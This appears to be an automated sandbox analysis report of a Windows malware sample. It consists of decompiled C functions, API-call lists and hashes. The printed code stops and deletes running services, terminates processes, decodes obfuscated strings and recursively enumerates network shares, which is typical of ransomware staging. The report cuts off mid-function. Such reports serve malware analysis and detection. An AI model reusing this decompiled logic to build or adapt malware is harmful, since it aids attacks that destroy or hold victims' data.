                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E009C5A21(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                            				int _v8;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				void _v44;
                                                                                                                                                            				struct _SERVICE_STATUS _v48;
                                                                                                                                                            				char _v116;
                                                                                                                                                            				char _v6796;
                                                                                                                                                            				void* _t25;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				long _t41;
                                                                                                                                                            				void* _t42;
                                                                                                                                                            				int _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				int _t66;
                                                                                                                                                            				void* _t68;
                                                                                                                                                            				long* _t73;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            
                                                                                                                                                            				E009CC600();
                                                                                                                                                            				_t66 = 0;
                                                                                                                                                            				E009C4832( &_v116, 0, 0x42);
                                                                                                                                                            				_t75 = _t74 + 0xc;
                                                                                                                                                            				_t25 = E009C5387();
                                                                                                                                                            				_t77 = _t25 - 0x600;
                                                                                                                                                            				if(_t25 < 0x600 || E009C5C11(__edx, _t77) == 0) {
                                                                                                                                                            					L22:
                                                                                                                                                            					_t26 = 0;
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					goto L23;
                                                                                                                                                            				} else {
                                                                                                                                                            					 *0x9d1d80 = OpenSCManagerW(0, L"ServicesActive", 4);
                                                                                                                                                            					_push( &_v116);
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(0x9d0f7c);
                                                                                                                                                            					if( *0x9d1124() != 0) {
                                                                                                                                                            						goto L22;
                                                                                                                                                            					}
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push( &_a4);
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_push( *0x9d0f7c);
                                                                                                                                                            					if( *0x9d10c8() != 0) {
                                                                                                                                                            						goto L22;
                                                                                                                                                            					}
                                                                                                                                                            					_v12 = 0xa;
                                                                                                                                                            					_push( &_v16);
                                                                                                                                                            					_push( &_v6796);
                                                                                                                                                            					_push( &_v12);
                                                                                                                                                            					_push( &_v20);
                                                                                                                                                            					_push( *0x9d0f7c);
                                                                                                                                                            					if( *0x9d10dc() != 0) {
                                                                                                                                                            						L21:
                                                                                                                                                            						 *0x9d1178( *0x9d0f7c);
                                                                                                                                                            						CloseServiceHandle( *0x9d1d80);
                                                                                                                                                            						_t26 = 1;
                                                                                                                                                            						L23:
                                                                                                                                                            						return _t26;
                                                                                                                                                            					}
                                                                                                                                                            					_t57 = 0;
                                                                                                                                                            					_v8 = 0;
                                                                                                                                                            					if(_v12 <= 0) {
                                                                                                                                                            						goto L21;
                                                                                                                                                            					}
                                                                                                                                                            					_t73 =  &_v6796;
                                                                                                                                                            					do {
                                                                                                                                                            						_t41 = _t73[0xa3];
                                                                                                                                                            						if(_t41 != 3) {
                                                                                                                                                            							__eflags =  *_t73 - 4;
                                                                                                                                                            							if( *_t73 == 4) {
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t41 - 0x3e8;
                                                                                                                                                            							if(_t41 == 0x3e8) {
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            							L16:
                                                                                                                                                            							_t42 = E009C4964( *_t73);
                                                                                                                                                            							_pop(0);
                                                                                                                                                            							__eflags = _t42;
                                                                                                                                                            							if(_t42 != 0) {
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            							_t68 = OpenProcess(1, _t66,  *_t73);
                                                                                                                                                            							__eflags = _t68;
                                                                                                                                                            							if(_t68 != 0) {
                                                                                                                                                            								TerminateProcess(_t68, 0);
                                                                                                                                                            								E009C4B21(_t68);
                                                                                                                                                            								_pop(0);
                                                                                                                                                            							}
                                                                                                                                                            							L19:
                                                                                                                                                            							E009C4917(0,  *_t73);
                                                                                                                                                            							_t57 = _v8;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            						_t58 = OpenServiceW( *0x9d1d80,  &(_t73[0x83]), 0x10020);
                                                                                                                                                            						if(_t58 == 0) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						_t61 = 6;
                                                                                                                                                            						_v48 = _t66;
                                                                                                                                                            						memset( &_v44, 0, _t61 << 2);
                                                                                                                                                            						_t75 = _t75 + 0xc;
                                                                                                                                                            						if(ControlService(_t58, 1,  &_v48) == 0) {
                                                                                                                                                            							_t57 = _v8;
                                                                                                                                                            							_t66 = 0;
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							goto L16;
                                                                                                                                                            						}
                                                                                                                                                            						if(DeleteService(_t58) == 0) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						CloseServiceHandle(_t58);
                                                                                                                                                            						goto L19;
                                                                                                                                                            						L20:
                                                                                                                                                            						_t57 = _t57 + 1;
                                                                                                                                                            						_t73 =  &(_t73[0xa7]);
                                                                                                                                                            						_v8 = _t57;
                                                                                                                                                            						_t66 = 0;
                                                                                                                                                            					} while (_t57 < _v12);
                                                                                                                                                            					goto L21;
                                                                                                                                                            				}
                                                                                                                                                            			}
























                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5C11: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,00000000,?), ref: 009C5C6B
                                                                                                                                                              • Part of subcall function 009C5C11: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 009C5C7B
                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000004,?,009C3071,?), ref: 009C5A68
                                                                                                                                                            • OpenServiceW.ADVAPI32(?,00010020), ref: 009C5B0A
                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009C5B2E
                                                                                                                                                            • DeleteService.ADVAPI32(00000000), ref: 009C5B39
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C5B44
                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C5B70
                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5B7F
                                                                                                                                                            • CloseServiceHandle.ADVAPI32 ref: 009C5BBF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Service$Open$CloseHandleProcess$ConditionControlDeleteInfoManagerMaskTerminateVerifyVersion
                                                                                                                                                            • String ID: ServicesActive
                                                                                                                                                            • API String ID: 3848605446-3071072050
                                                                                                                                                            • Opcode ID: 2c69a9c2e9484eb6798d2e1feed28c75b27ae8a6f1cfe7abebd7041b0cab6d13
                                                                                                                                                            • Instruction ID: a6a2b702236ca8e8f6f6dee1fa5eafb42742a2f6aa8e0515c63e98b17b31d443
                                                                                                                                                            • Opcode Fuzzy Hash: 2c69a9c2e9484eb6798d2e1feed28c75b27ae8a6f1cfe7abebd7041b0cab6d13
                                                                                                                                                            • Instruction Fuzzy Hash: F4419376A55605BBDB20ABA5DC44FAF7BBDEB95700F11002FF601E2151DB31ADC0DA22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E009C4284(signed int __edx, void* _a4, struct HDC__* _a8, WCHAR* _a12) {
                                                                                                                                                            				long _v8;
                                                                                                                                                            				intOrPtr _v14;
                                                                                                                                                            				intOrPtr _v18;
                                                                                                                                                            				intOrPtr _v22;
                                                                                                                                                            				void _v24;
                                                                                                                                                            				signed int _v30;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed short _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				char _v48;
                                                                                                                                                            				int _t45;
                                                                                                                                                            				signed int _t48;
                                                                                                                                                            				void* _t57;
                                                                                                                                                            				long _t63;
                                                                                                                                                            				void* _t64;
                                                                                                                                                            				int _t80;
                                                                                                                                                            				int _t83;
                                                                                                                                                            				void* _t84;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				int _t106;
                                                                                                                                                            				void* _t107;
                                                                                                                                                            
                                                                                                                                                            				_t96 = __edx;
                                                                                                                                                            				_push( &_v48);
                                                                                                                                                            				_t106 = 0x18;
                                                                                                                                                            				_t45 = GetObjectW(_a4, _t106, ??);
                                                                                                                                                            				if(_t45 != 0) {
                                                                                                                                                            					_t48 = _v30 * _v32 & 0x0000ffff;
                                                                                                                                                            					if(_t48 != 1) {
                                                                                                                                                            						_t83 = 4;
                                                                                                                                                            						if(_t48 <= _t83) {
                                                                                                                                                            							L9:
                                                                                                                                                            							_push(0x28 + (1 << _t83) * 4);
                                                                                                                                                            							L10:
                                                                                                                                                            							_t107 = LocalAlloc(0x40, ??);
                                                                                                                                                            							 *_t107 = 0x28;
                                                                                                                                                            							 *((intOrPtr*)(_t107 + 4)) = _v44;
                                                                                                                                                            							 *(_t107 + 8) = _v40;
                                                                                                                                                            							 *((short*)(_t107 + 0xc)) = _v32;
                                                                                                                                                            							 *((short*)(_t107 + 0xe)) = _v30;
                                                                                                                                                            							_t57 = 0x18;
                                                                                                                                                            							if(_t83 < _t57) {
                                                                                                                                                            								 *(_t107 + 0x20) = 1 << _t83;
                                                                                                                                                            							}
                                                                                                                                                            							asm("cdq");
                                                                                                                                                            							 *((intOrPtr*)(_t107 + 0x10)) = 0;
                                                                                                                                                            							 *((intOrPtr*)(_t107 + 0x24)) = 0;
                                                                                                                                                            							_t63 = ( *((intOrPtr*)(_t107 + 4)) + 7 + (_t96 & 0x00000007) >> 3) * (_t83 & 0x0000ffff) *  *(_t107 + 8);
                                                                                                                                                            							 *(_t107 + 0x14) = _t63;
                                                                                                                                                            							_t64 = GlobalAlloc(0, _t63);
                                                                                                                                                            							_t84 = _t64;
                                                                                                                                                            							if(_t84 == 0) {
                                                                                                                                                            								L21:
                                                                                                                                                            								return _t64;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t64 = GetDIBits(_a8, _a4, 0,  *(_t107 + 8) & 0x0000ffff, _t84, _t107, 0);
                                                                                                                                                            								if(_t64 == 0) {
                                                                                                                                                            									goto L21;
                                                                                                                                                            								}
                                                                                                                                                            								_t64 = CreateFileW(_a12, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                            								_t104 = _t64;
                                                                                                                                                            								if(_t104 == 0xffffffff) {
                                                                                                                                                            									goto L21;
                                                                                                                                                            								}
                                                                                                                                                            								_v24 = 0x4d42;
                                                                                                                                                            								_v22 =  *_t107 +  *(_t107 + 0x14) +  *(_t107 + 0x20) * 4 + 0xe;
                                                                                                                                                            								_v18 = 0;
                                                                                                                                                            								_v14 =  *_t107 +  *(_t107 + 0x20) * 4 + 0xe;
                                                                                                                                                            								if(WriteFile(_t104,  &_v24, 0xe,  &_v8, 0) == 0 || WriteFile(_t104, _t107, 0x28 +  *(_t107 + 0x20) * 4,  &_v8, 0) == 0) {
                                                                                                                                                            									_push(_t104);
                                                                                                                                                            									goto L19;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t80 = WriteFile(_t104, _t84,  *(_t107 + 0x14),  &_v8, 0);
                                                                                                                                                            									_push(_t104);
                                                                                                                                                            									if(_t80 != 0) {
                                                                                                                                                            										E009C4B21();
                                                                                                                                                            										_t64 = GlobalFree(_t84);
                                                                                                                                                            										goto L21;
                                                                                                                                                            									}
                                                                                                                                                            									L19:
                                                                                                                                                            									_t64 = E009C4B21();
                                                                                                                                                            									goto L21;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t83 = 8;
                                                                                                                                                            						if(_t48 <= _t83) {
                                                                                                                                                            							goto L9;
                                                                                                                                                            						}
                                                                                                                                                            						_t83 = 0x10;
                                                                                                                                                            						if(_t48 <= _t83) {
                                                                                                                                                            							goto L9;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t48 > _t106) {
                                                                                                                                                            							_t83 = 0x20;
                                                                                                                                                            							goto L9;
                                                                                                                                                            						}
                                                                                                                                                            						_t83 = _t106;
                                                                                                                                                            						_push(0x28);
                                                                                                                                                            						goto L10;
                                                                                                                                                            					}
                                                                                                                                                            					_t83 = 1;
                                                                                                                                                            					goto L9;
                                                                                                                                                            				}
                                                                                                                                                            				return _t45;
                                                                                                                                                            			}


























                                                                                                                                                            APIs
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4296
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C42F2
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4351
                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009C4370
                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,009C470E,?,00000000), ref: 009C4390
                                                                                                                                                            • WriteFile.KERNEL32(00000000,009C470E,0000000E,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C43DD
                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C43FA
                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009C470E,?,00000000,00000000), ref: 009C4412
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009C442C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 351847640-0
                                                                                                                                                            • Opcode ID: 61a66eb70b68895af1a9080f5b3778b0bc256bc7c19125e5c6b1ce506ff45900
                                                                                                                                                            • Instruction ID: 7a4d2ec65c9ea3d52c6c1e225e6be490e70e389c8b36de1bf33ec1006ac91c01
                                                                                                                                                            • Opcode Fuzzy Hash: 61a66eb70b68895af1a9080f5b3778b0bc256bc7c19125e5c6b1ce506ff45900
                                                                                                                                                            • Instruction Fuzzy Hash: 9251E076A00205ABE7209FA5DC95FABB7FCEF48710F50841EFA96C7290D7309941DB21
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E009C2D63(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				short _v6;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				short _v14;
                                                                                                                                                            				char _v40;
                                                                                                                                                            				short _v42;
                                                                                                                                                            				char _v80;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				WCHAR* _t53;
                                                                                                                                                            
                                                                                                                                                            				if( *0x9d22ac != 0) {
                                                                                                                                                            					return 1;
                                                                                                                                                            				}
                                                                                                                                                            				_t66 = _a8;
                                                                                                                                                            				if(_a8 != 0) {
                                                                                                                                                            					E009C6097(_a4);
                                                                                                                                                            					E009C6097(_t66);
                                                                                                                                                            					if( *0x9d1d18 != 0) {
                                                                                                                                                            						L9:
                                                                                                                                                            						E009C5DE2(0x9d0270, 0xba5, 0x10, 0x1a,  &_v40);
                                                                                                                                                            						_v14 = 0;
                                                                                                                                                            						E009C5DE2(0x9d0270, 0x88f, 0xb, 0x26,  &_v80);
                                                                                                                                                            						_v42 = 0;
                                                                                                                                                            						if(E009C6146(_t66,  &_v40) == 0 || E009C6146(_t66,  &_v80) == 0) {
                                                                                                                                                            							_t29 = 1;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(E009C62B6(_a4,  &_v40) == 0) {
                                                                                                                                                            								_t34 = E009C64BF(0x9d2234, _t66);
                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                            								_t29 =  ~_t34 + 1;
                                                                                                                                                            							} else {
                                                                                                                                                            								E009C5DE2(0x9d0270, 0x5e6, 0xc, 6,  &_v12);
                                                                                                                                                            								_v6 = 0;
                                                                                                                                                            								_t40 = E009C62B6(_a4,  &_v12);
                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                            								_t29 =  ~( ~_t40);
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L15:
                                                                                                                                                            						L16:
                                                                                                                                                            						return _t29;
                                                                                                                                                            					}
                                                                                                                                                            					_t53 = L"\\\\?\\c:\\windows\\";
                                                                                                                                                            					if( *0x9d1d1c == 0) {
                                                                                                                                                            						GetWindowsDirectoryW(lstrlenW(_t53) * 2 + L"\\\\?\\c:\\windows\\", 0x104);
                                                                                                                                                            						PathAddBackslashW(_t53);
                                                                                                                                                            						E009C6097(_t53);
                                                                                                                                                            						 *0x9d1d1c = 1;
                                                                                                                                                            					}
                                                                                                                                                            					_t29 = E009C6146(_t53, _a4);
                                                                                                                                                            					if(_t29 != 0) {
                                                                                                                                                            						goto L9;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *0x9d1d18 = 1;
                                                                                                                                                            						goto L15;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t29 = 1;
                                                                                                                                                            				goto L16;
                                                                                                                                                            			}














                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \\?\c:\windows\
                                                                                                                                                            • API String ID: 0-2558258126
                                                                                                                                                            • Opcode ID: a50a3407036874e4b3feb5b88faf9c68953ac22c8e6358bdb39f75b5af2a1847
                                                                                                                                                            • Instruction ID: 921e7c9f1ad25a4b5b00593cb122988b571a99f6c4525246c44360e6c24521a6
                                                                                                                                                            • Opcode Fuzzy Hash: a50a3407036874e4b3feb5b88faf9c68953ac22c8e6358bdb39f75b5af2a1847
                                                                                                                                                            • Instruction Fuzzy Hash: 3E310572D58308BAEB24EB70DC42FAE37ACDF45344F10442AF902F61C1EB74998087A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E009C7A1F(int _a4, int _a8, struct _NETRESOURCE* _a12) {
                                                                                                                                                            				struct _NETRESOURCE* _v8;
                                                                                                                                                            				int _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				int _v20;
                                                                                                                                                            				struct _NETRESOURCE* _v24;
                                                                                                                                                            				short _v26;
                                                                                                                                                            				char _v40;
                                                                                                                                                            				struct _NETRESOURCE* _t41;
                                                                                                                                                            				signed int _t43;
                                                                                                                                                            				struct _NETRESOURCE* _t45;
                                                                                                                                                            				struct _NETRESOURCE* _t60;
                                                                                                                                                            				void* _t64;
                                                                                                                                                            				struct _NETRESOURCE* _t71;
                                                                                                                                                            				struct _NETRESOURCE* _t72;
                                                                                                                                                            				struct _NETRESOURCE** _t74;
                                                                                                                                                            				void* _t76;
                                                                                                                                                            
                                                                                                                                                            				_t71 = _a12;
                                                                                                                                                            				if(WNetOpenEnumW(_a8, 0, 0, _t71,  &_v16) == 0) {
                                                                                                                                                            					_v12 = _v12 | 0xffffffff;
                                                                                                                                                            					_v20 = 0x4000;
                                                                                                                                                            					_t64 = E009C47AB(0x4000);
                                                                                                                                                            					__eflags = _t64;
                                                                                                                                                            					if(_t64 != 0) {
                                                                                                                                                            						goto L5;
                                                                                                                                                            						do {
                                                                                                                                                            							while(1) {
                                                                                                                                                            								L5:
                                                                                                                                                            								_t41 = WNetEnumResourceW(_v16,  &_v12, _t64,  &_v20);
                                                                                                                                                            								_v24 = _t41;
                                                                                                                                                            								__eflags = _t41;
                                                                                                                                                            								if(_t41 != 0) {
                                                                                                                                                            									goto L21;
                                                                                                                                                            								}
                                                                                                                                                            								_v8 = _t41;
                                                                                                                                                            								__eflags = _v12 - _t41;
                                                                                                                                                            								if(_v12 <= _t41) {
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								_t14 = _t64 + 0x14; // 0x14
                                                                                                                                                            								_t74 = _t14;
                                                                                                                                                            								do {
                                                                                                                                                            									__eflags =  *(_t74 - 8) & 0x00000002;
                                                                                                                                                            									if(( *(_t74 - 8) & 0x00000002) == 0) {
                                                                                                                                                            										goto L15;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t71;
                                                                                                                                                            									if(_t71 == 0) {
                                                                                                                                                            										L13:
                                                                                                                                                            										_t20 = _t74 - 0x14; // 0x0
                                                                                                                                                            										E009C7A1F(_a4, _a8, _t20);
                                                                                                                                                            										_t76 = _t76 + 0xc;
                                                                                                                                                            										L14:
                                                                                                                                                            										_t41 = _v8;
                                                                                                                                                            										goto L15;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags =  *(_t71 + 0x14);
                                                                                                                                                            									if( *(_t71 + 0x14) == 0) {
                                                                                                                                                            										goto L15;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags =  *_t74;
                                                                                                                                                            									if( *_t74 == 0) {
                                                                                                                                                            										goto L15;
                                                                                                                                                            									}
                                                                                                                                                            									_t60 = E009C6146( *(_t71 + 0x14),  *_t74);
                                                                                                                                                            									__eflags = _t60;
                                                                                                                                                            									if(_t60 == 0) {
                                                                                                                                                            										goto L14;
                                                                                                                                                            									}
                                                                                                                                                            									goto L13;
                                                                                                                                                            									L15:
                                                                                                                                                            									__eflags =  *((intOrPtr*)(_t74 - 0x10)) - 1;
                                                                                                                                                            									if( *((intOrPtr*)(_t74 - 0x10)) == 1) {
                                                                                                                                                            										_t72 = E009C47AB(0xfffe);
                                                                                                                                                            										__eflags = _t72;
                                                                                                                                                            										if(_t72 != 0) {
                                                                                                                                                            											E009C5DE2(0x9d12d0, 0x4f, 0xf, 0xe,  &_v40);
                                                                                                                                                            											_v26 = 0;
                                                                                                                                                            											E009C61A7(_t72,  &_v40);
                                                                                                                                                            											E009C60C5(__eflags, _t72,  *_t74 + 2);
                                                                                                                                                            											E009C60C5(__eflags, _t72, 0x9cd2ec);
                                                                                                                                                            											 *0x9d1d00 =  *0x9d1d00 & 0x00000000;
                                                                                                                                                            											__eflags =  *0x9d1d00;
                                                                                                                                                            											E009C761A(_t72, _a4);
                                                                                                                                                            											E009C47F8(_t72);
                                                                                                                                                            											_t76 = _t76 + 0x38;
                                                                                                                                                            										}
                                                                                                                                                            										_t71 = _a12;
                                                                                                                                                            										_t41 = _v8;
                                                                                                                                                            									}
                                                                                                                                                            									_t41 = _t41 + 1;
                                                                                                                                                            									_t74 =  &(_t74[8]);
                                                                                                                                                            									_v8 = _t41;
                                                                                                                                                            									__eflags = _t41 - _v12;
                                                                                                                                                            								} while (_t41 < _v12);
                                                                                                                                                            								_t41 = _v24;
                                                                                                                                                            								goto L21;
                                                                                                                                                            							}
                                                                                                                                                            							L21:
                                                                                                                                                            							__eflags = _t41 - 0x103;
                                                                                                                                                            						} while (_t41 != 0x103);
                                                                                                                                                            						E009C47F8(_t64);
                                                                                                                                                            						_t43 = WNetCloseEnum(_v16);
                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                            						_t45 =  ~_t43 + 1;
                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                            						L23:
                                                                                                                                                            						return _t45;
                                                                                                                                                            					}
                                                                                                                                                            					WNetCloseEnum(_v16);
                                                                                                                                                            					_t45 = 0;
                                                                                                                                                            					goto L23;
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}




















                                                                                                                                                            APIs
                                                                                                                                                            • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,00000001), ref: 009C7A35
                                                                                                                                                            • WNetCloseEnum.MPR(00000001), ref: 009C7A63
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Enum$CloseOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1701607978-0
                                                                                                                                                            • Opcode ID: 59d682d2769c7ffa8c72f02591651c1d8de3acbb8d02d9656d0fa725ad70eb9a
                                                                                                                                                            • Instruction ID: 9dac54037c2c609fae9d8da341fbee91e842dc5ed3fcac5841e2016b86418a3b
                                                                                                                                                            • Opcode Fuzzy Hash: 59d682d2769c7ffa8c72f02591651c1d8de3acbb8d02d9656d0fa725ad70eb9a
                                                                                                                                                            • Instruction Fuzzy Hash: 68418D36D08209BAEB21DFE4DC45FAEB7BDEF84310F200529E511A2190E7309A509B62
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
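                                                                                                                                                            			/* Decompiler output: waits for the process whose PID is _a4 to exit. */
                                                                                                                                                            			E009C4917(void* __ecx, long _a4) {
                                                                                                                                                            				long _v8;
                                                                                                                                                            				void* _t6;
                                                                                                                                                            				void* _t13;
                                                                                                                                                            
                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                            				/* 0x400 = PROCESS_QUERY_INFORMATION, handle not inheritable */
                                                                                                                                                            				_t6 = OpenProcess(0x400, 0, _a4);
                                                                                                                                                            				_t13 = _t6;
                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                            					/* Poll the exit code once per second (0x3e8 = 1000 ms) */
                                                                                                                                                            					/* while it is still 0x103 (STILL_ACTIVE). */
                                                                                                                                                            					do {
                                                                                                                                                            						GetExitCodeProcess(_t13,  &_v8);
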